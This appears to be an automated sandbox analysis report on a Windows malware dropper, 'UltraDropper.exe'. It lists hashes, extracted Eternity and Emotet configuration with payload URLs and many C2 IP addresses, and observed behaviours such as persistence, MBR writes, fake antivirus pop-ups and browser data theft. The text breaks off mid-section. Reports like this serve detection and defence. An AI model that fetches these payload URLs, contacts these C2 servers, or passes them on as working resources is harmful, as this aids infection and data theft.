Analysis
-
max time kernel
124s -
max time network
152s -
platform
windows11-21h2_x64 -
resource
win11-20241023-en -
resource tags
arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system -
submitted
08-11-2024 17:45
Static task
static1
Behavioral task
behavioral1
Sample
UltraDropper.exe
Resource
win11-20241023-en
General
-
Target
UltraDropper.exe
-
Size
60KB
-
MD5
b2155129ecaf078020239d57841643a6
-
SHA1
ac3231da4f91bf288f398d7923d717812e1207ca
-
SHA256
46e78d76c9c3c0305c6a547525b3ea26f9a20e10fcf534a3886921304a5991b4
-
SHA512
165557e7f186f3a5b2ed6231cc27f86974bf7d1ee539faf963a092fb6d9012191ad37d4f1ce9de8a69fc1ff37135a0f76898c1d91a8d23b328db49f9e9c4c0c3
-
SSDEEP
768:syT1o1uw3klvq3fWFRsmP1pNXT4Cabs3l+xdTqOf70QuVORH:syNw5fSDz+s3ls8u70QuVs
Malware Config
Extracted
eternity
http://eternityms33k74r7iuuxfda4sqsiei3o3lbtr5cpalf6f4skszpruad.onion
-
payload_urls
https://raroford3242.xyz/myupdate.exe
https://raroford3242.xyz/Sklmsstregens.vbs, https://raroford3242.xyz/remcexecrypt.exe, https://raroford3242.xyz/redlcryp.exe, https://raroford3242.xyz/racoocry.exe
https://raroford3242.xyz/myupdate.exe
https://raroford3242.xyz/myupdate.exe
Extracted
emotet
Epoch5
178.238.225.252:8080
139.196.72.155:8080
36.67.23.59:443
103.56.149.105:8080
37.44.244.177:8080
85.25.120.45:8080
202.134.4.210:7080
78.47.204.80:443
83.229.80.93:8080
93.104.209.107:8080
80.211.107.116:8080
165.22.254.236:8080
104.244.79.94:443
185.148.169.10:8080
190.145.8.4:443
175.126.176.79:8080
139.59.80.108:8080
188.165.79.151:443
128.199.217.206:443
64.227.55.231:8080
218.38.121.17:443
103.71.99.57:8080
103.224.241.74:8080
128.199.242.164:8080
85.214.67.203:8080
103.254.12.236:7080
46.101.98.60:8080
178.62.112.199:8080
210.57.209.142:8080
195.77.239.39:8080
103.126.216.86:443
82.98.180.154:7080
202.28.34.99:8080
174.138.33.49:7080
160.16.143.191:8080
51.75.33.122:443
103.41.204.169:8080
186.250.48.5:443
87.106.97.83:7080
118.98.72.86:443
196.44.98.190:8080
103.85.95.4:8080
62.171.178.147:8080
54.37.228.122:443
114.79.130.68:443
198.199.70.22:8080
Signatures
-
Emotet family
-
Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
-
Eternity family
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Privateloader family
-
Processes:
antivirus-platinum.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" antivirus-platinum.exe -
Disables RegEdit via registry modification 1 IoCs
Processes:
antivirus-platinum.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" antivirus-platinum.exe -
Executes dropped EXE 11 IoCs
Processes:
[email protected]Worm (1).exe[email protected]Install.exe[email protected]is-R2T2J.tmp302746537.exeantivirus-platinum.exeRegistrySmart.exeLauncher.exeRegistrySmart.exepid process 2196 [email protected] 2780 Worm (1).exe 3028 [email protected] 2792 Install.exe 1696 [email protected] 5056 is-R2T2J.tmp 1968 302746537.exe 3488 antivirus-platinum.exe 2860 RegistrySmart.exe 1860 Launcher.exe 424 RegistrySmart.exe -
Loads dropped DLL 6 IoCs
Processes:
regsvr32.exeregsvr32.exeregsvr32.exeregsvr32.exeregsvr32.exeantivirus-platinum.exepid process 900 regsvr32.exe 3096 regsvr32.exe 3916 regsvr32.exe 3772 regsvr32.exe 3484 regsvr32.exe 3488 antivirus-platinum.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
antivirus-platinum.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" antivirus-platinum.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
[email protected]is-R2T2J.tmpdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\AntiVirus Pro 2017 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\[email protected]" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RegistrySmart = "\"C:\\Program Files\\RegistrySmart\\RegistrySmart.exe\" -boot" is-R2T2J.tmp -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 21 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
description ioc process File opened (read-only) \??\V: [email protected] File opened (read-only) \??\K: [email protected] File opened (read-only) \??\N: [email protected] File opened (read-only) \??\S: [email protected] File opened (read-only) \??\U: [email protected] File opened (read-only) \??\E: [email protected] File opened (read-only) \??\G: [email protected] File opened (read-only) \??\H: [email protected] File opened (read-only) \??\M: [email protected] File opened (read-only) \??\R: [email protected] File opened (read-only) \??\T: [email protected] File opened (read-only) \??\I: [email protected] File opened (read-only) \??\J: [email protected] File opened (read-only) \??\L: [email protected] File opened (read-only) \??\W: [email protected] File opened (read-only) \??\X: [email protected] File opened (read-only) \??\Y: [email protected] File opened (read-only) \??\Z: [email protected] File opened (read-only) \??\O: [email protected] File opened (read-only) \??\P: [email protected] File opened (read-only) \??\Q: [email protected] -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
Processes:
flow ioc 2 raw.githubusercontent.com 11 raw.githubusercontent.com 15 raw.githubusercontent.com 17 raw.githubusercontent.com 24 raw.githubusercontent.com 27 raw.githubusercontent.com 31 raw.githubusercontent.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 10 ipinfo.io 10 api.db-ip.com 34 ipinfo.io 36 api.db-ip.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
description ioc process File opened for modification \??\PhysicalDrive0 [email protected] -
Drops file in System32 directory 4 IoCs
Processes:
Install.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy Install.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini Install.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI Install.exe -
Processes:
resource yara_rule C:\Windows\302746537.exe upx behavioral1/memory/1968-81-0x0000000000400000-0x0000000000410000-memory.dmp upx \??\c:\windows\antivirus-platinum.exe upx behavioral1/memory/3488-116-0x0000000000400000-0x000000000040D000-memory.dmp upx behavioral1/memory/1968-121-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/3488-164-0x0000000000400000-0x000000000040D000-memory.dmp upx behavioral1/memory/3488-170-0x0000000000400000-0x000000000040D000-memory.dmp upx -
Drops file in Program Files directory 7 IoCs
Processes:
is-R2T2J.tmpdescription ioc process File created C:\Program Files (x86)\RegistrySmart\is-97CQS.tmp is-R2T2J.tmp File opened for modification C:\Program Files (x86)\RegistrySmart\RegistrySmart.url is-R2T2J.tmp File opened for modification C:\Program Files (x86)\RegistrySmart\unins000.dat is-R2T2J.tmp File created C:\Program Files (x86)\RegistrySmart\unins000.dat is-R2T2J.tmp File created C:\Program Files (x86)\RegistrySmart\is-GRT8P.tmp is-R2T2J.tmp File created C:\Program Files (x86)\RegistrySmart\is-II5MQ.tmp is-R2T2J.tmp File created C:\Program Files (x86)\RegistrySmart\is-371H9.tmp is-R2T2J.tmp -
Drops file in Windows directory 12 IoCs
Processes:
description ioc process File created C:\Windows\antivirus-platinum.exe [email protected] File opened for modification C:\Windows\COMCTL32.OCX [email protected] File opened for modification C:\windows\antivirus-platinum.exe attrib.exe File created C:\Windows\Tasks\RegistrySmart Scheduled Scan.job RegistrySmart.exe File created C:\Windows\__tmp_rar_sfx_access_check_240650875 [email protected] File created C:\Windows\COMCTL32.OCX [email protected] File created C:\Windows\MSCOMCTL.OCX [email protected] File opened for modification C:\Windows\MSCOMCTL.OCX [email protected] File created C:\Windows\302746537.exe [email protected] File opened for modification C:\Windows\302746537.exe [email protected] File opened for modification C:\Windows\Tasks\RegistrySmart Scheduled Scan.job RegistrySmart.exe File opened for modification C:\Windows\antivirus-platinum.exe [email protected] -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 5 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
RegistrySmart.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\netsh RegistrySmart.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh RegistrySmart.exe Key security queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh RegistrySmart.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh RegistrySmart.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh RegistrySmart.exe -
System Location Discovery: System Language Discovery 1 TTPs 35 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
attrib.exeRegistrySmart.execurl.execmd.execmd.exe[email protected]Worm (1).execmd.execurl.exeregsvr32.execurl.execmd.execurl.execmd.exeregsvr32.exeis-R2T2J.tmpLauncher.exeRegistrySmart.execmd.execmd.exe[email protected][email protected]antivirus-platinum.exeregsvr32.exeUltraDropper.execmd.execmd.exeInstall.execmd.execmd.execmd.execurl.execurl.execmd.exe302746537.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegistrySmart.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Worm (1).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language is-R2T2J.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Launcher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegistrySmart.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language antivirus-platinum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UltraDropper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 302746537.exe -
Processes:
antivirus-platinum.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\Main\Window Title = "YOUR PC MAY BE INFECTED WITH SPYWARE OR OTHER MALICIOUS ITEMS" antivirus-platinum.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main antivirus-platinum.exe Key created \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\Main antivirus-platinum.exe -
Modifies Internet Explorer start page 1 TTPs 2 IoCs
Processes:
antivirus-platinum.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://secureservices2010.webs.com/scan" antivirus-platinum.exe Set value (str) \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://secureservices2010.webs.com/scan" antivirus-platinum.exe -
Modifies registry class 64 IoCs
Processes:
regsvr32.exeregsvr32.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8E3867A3-8586-11D1-B16A-00C0F0283628}\MiscStatus\1\ = "172433" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8E3867A1-8586-11D1-B16A-00C0F0283628}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8E3867A1-8586-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{373FF7F4-EB8B-11CD-8820-08002B2F4F5A} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F4D83604-895E-11D0-B0A6-000000000000}\TypeLib\Version = "1.3" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8A1-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1EFB6596-857C-11D1-B16A-00C0F0283628}\InprocServer32\ = "c:\\windows\\mscomctl.ocx" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8A1-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8B0-850A-101B-AFC0-4210102A8DA7}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1EFB6596-857C-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8E3867A2-8586-11D1-B16A-00C0F0283628}\ProxyStubClsid32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C74190B7-8589-11D1-B16A-00C0F0283628}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{373FF7F0-EB8B-11CD-8820-08002B2F4F5A}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9ED94441-E5E8-101B-B9B5-444553540000}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDD1F04B-858B-11D1-B16A-00C0F0283628}\Implemented Categories regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.TabStrip regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6E1B5150-DB62-11D0-A0D8-0080C7E7B78D}\TypeLib\Version = "1.3" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E6E17E82-DF38-11CF-8E74-00A0C90F26F8} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2C247F23-8591-11D1-B16A-00C0F0283628}\InprocServer32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6B7E638F-850A-101B-AFC0-4210102A8DA7}\ProgID\ = "COMCTL.SBarCtrl.1" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8AF-850A-101B-AFC0-4210102A8DA7}\ = "IListItem10" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8A7-850A-101B-AFC0-4210102A8DA7}\ = "INodes10" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6E17E86-DF38-11CF-8E74-00A0C90F26F8}\TypeLib\Version = "1.3" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD9DA666-8594-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{66833FE9-8583-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B66834C6-2E60-11CE-8748-524153480004} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6E17E88-DF38-11CF-8E74-00A0C90F26F8}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{35053A22-8589-11D1-B16A-00C0F0283628}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8E3867AA-8586-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F049-858B-11D1-B16A-00C0F0283628}\ = "IListView" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.Toolbar.1\ = "Microsoft Toolbar Control, version 5.0 (SP2)" regsvr32.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{612A8624-0FB3-11CE-8747-524153480004}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1EFB6595-857C-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.Toolbar\CLSID regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2C247F23-8591-11D1-B16A-00C0F0283628}\Version\ = "2.0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F4D83604-895E-11D0-B0A6-000000000000}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EC0AB1C0-6CAB-11CF-8998-00AA00688B10}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1EFB6594-857C-11D1-B16A-00C0F0283628}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BDD1F04E-858B-11D1-B16A-00C0F0283628}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD9DA664-8594-11D1-B16A-00C0F0283628}\ = "IImageCombo" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7791BA52-E020-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2C787A52-E01C-11CF-8E74-00A0C90F26F8} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2C247F23-8591-11D1-B16A-00C0F0283628}\Implemented Categories\{40FC6ED4-2438-11CF-A3DB-080036F12502} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE3D-8596-11D1-B16A-00C0F0283628}\InprocServer32\ = "c:\\windows\\mscomctl.ocx" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9ED94441-E5E8-101B-B9B5-444553540000} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DA8D91-9D6A-101B-AFC0-4210102A8DA7}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6E17E84-DF38-11CF-8E74-00A0C90F26F8}\TypeLib\Version = "1.3" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8A1-850A-101B-AFC0-4210102A8DA7}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8A4-850A-101B-AFC0-4210102A8DA7} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD9DA665-8594-11D1-B16A-00C0F0283628} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.ImageListCtrl.1\CLSID\ = "{58DA8D8F-9D6A-101B-AFC0-4210102A8DA7}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2C247F24-8591-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{58DA8D8A-9D6A-101B-AFC0-4210102A8DA7}\InprocServer32\ = "c:\\windows\\comctl32.ocx" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.ListViewCtrl\CLSID regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E451-850A-101B-AFC0-4210102A8DA7}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F4D83603-895E-11D0-B0A6-000000000000}\TypeLib\Version = "1.3" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6E17E80-DF38-11CF-8E74-00A0C90F26F8}\TypeLib\Version = "1.3" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDD1F04B-858B-11D1-B16A-00C0F0283628}\VersionIndependentProgID\ = "MSComctlLib.ListViewCtrl" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.TreeCtrl.2 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{62823C20-41A3-11CE-9E8B-0020AF039CA3}\ = "Button Property Page Object" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5ACBB956-5C57-11CF-8993-00AA00688B10}\InprocServer32\ = "c:\\windows\\comctl32.ocx" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8A1-850A-101B-AFC0-4210102A8DA7} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6B7E6390-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2C247F24-8591-11D1-B16A-00C0F0283628}\TypeLib regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 32 IoCs
Processes:
regsvr32.exeInstall.exeregsvr32.exepid process 3096 regsvr32.exe 3096 regsvr32.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 2792 Install.exe 3772 regsvr32.exe 3772 regsvr32.exe 3772 regsvr32.exe 3772 regsvr32.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
RegistrySmart.exepid process 424 RegistrySmart.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
7z.exe7z.exe7z.exe7z.exe7z.exe7z.exeWorm (1).exedescription pid process Token: SeRestorePrivilege 1056 7z.exe Token: 35 1056 7z.exe Token: SeSecurityPrivilege 1056 7z.exe Token: SeSecurityPrivilege 1056 7z.exe Token: SeRestorePrivilege 1124 7z.exe Token: 35 1124 7z.exe Token: SeSecurityPrivilege 1124 7z.exe Token: SeSecurityPrivilege 1124 7z.exe Token: SeRestorePrivilege 2328 7z.exe Token: 35 2328 7z.exe Token: SeSecurityPrivilege 2328 7z.exe Token: SeSecurityPrivilege 2328 7z.exe Token: SeRestorePrivilege 4132 7z.exe Token: 35 4132 7z.exe Token: SeSecurityPrivilege 4132 7z.exe Token: SeSecurityPrivilege 4132 7z.exe Token: SeRestorePrivilege 2512 7z.exe Token: 35 2512 7z.exe Token: SeSecurityPrivilege 2512 7z.exe Token: SeSecurityPrivilege 2512 7z.exe Token: SeRestorePrivilege 3936 7z.exe Token: 35 3936 7z.exe Token: SeSecurityPrivilege 3936 7z.exe Token: SeSecurityPrivilege 3936 7z.exe Token: SeDebugPrivilege 2780 Worm (1).exe -
Suspicious use of FindShellTrayWindow 11 IoCs
Processes:
pid process 2196 [email protected] 2196 [email protected] 2196 [email protected] 2860 RegistrySmart.exe 2860 RegistrySmart.exe 424 RegistrySmart.exe 2196 [email protected] 2196 [email protected] 2196 [email protected] 2196 [email protected] 2196 [email protected] -
Suspicious use of SendNotifyMessage 11 IoCs
Processes:
pid process 2196 [email protected] 2196 [email protected] 2196 [email protected] 2860 RegistrySmart.exe 2860 RegistrySmart.exe 424 RegistrySmart.exe 2196 [email protected] 2196 [email protected] 2196 [email protected] 2196 [email protected] 2196 [email protected] -
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
pid process 2196 [email protected] 2196 [email protected] 3488 antivirus-platinum.exe 2860 RegistrySmart.exe 2860 RegistrySmart.exe 1860 Launcher.exe 424 RegistrySmart.exe 424 RegistrySmart.exe 424 RegistrySmart.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
